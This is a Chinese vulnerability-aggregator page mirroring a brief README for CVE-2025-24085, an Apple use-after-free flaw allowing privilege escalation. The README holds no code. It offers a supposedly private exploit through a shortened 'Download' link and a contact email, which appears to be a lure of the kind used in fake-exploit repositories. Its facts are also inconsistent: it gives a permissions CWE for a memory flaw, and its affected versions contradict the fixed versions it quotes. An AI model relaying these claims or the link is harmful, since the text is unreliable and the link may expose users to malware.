关联漏洞
标题:
N/A
(CVE-2025-24085)
描述:该漏洞涉及使用已释放的内存(use after free)问题,通过改进内存管理得到了解决。该问题已在 visionOS 2.3、iOS 18.3 和 iPadOS 18.3、macOS Sequoia 15.3、watchOS 11.3 和 tvOS 18.3 中修复。恶意应用可能能够提升权限。Apple 意识到有报告称该问题可能已在 iOS 17.2 之前的版本中被积极利用。
描述
CVE-2025-24085: Incorrect Default Permissions (CWE-276)
介绍
# CVE-2025-24085
## Overview
A malicious application that can elevate privileges. This issue has been actively exploited against versions of iOS before iOS 17.2. The vulnerability can be used to gain higher-level access to the system, which leads to unauthorized control, data theft, or system compromise.
## Details
+ CVE ID: CVE-2025-24085
+ Published: 2025-01-27
+ Impact: Critical
+ Exploit Availability: Not public, only private.
## Affected Versions
Versions of iOS before **iOS 17.2**
Versions prior to visionOS 2.3
Versions prior to iPadOS 17.7
## Contact
For inquiries, please contact clidanc@thesecure.biz
## Exploit
[Download](https://tinyurl.com/454xyk83)
文件快照
[4.0K] /data/pocs/38f800e6847d97daf2b0e710e00a315fae2407c4
└── [ 678] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。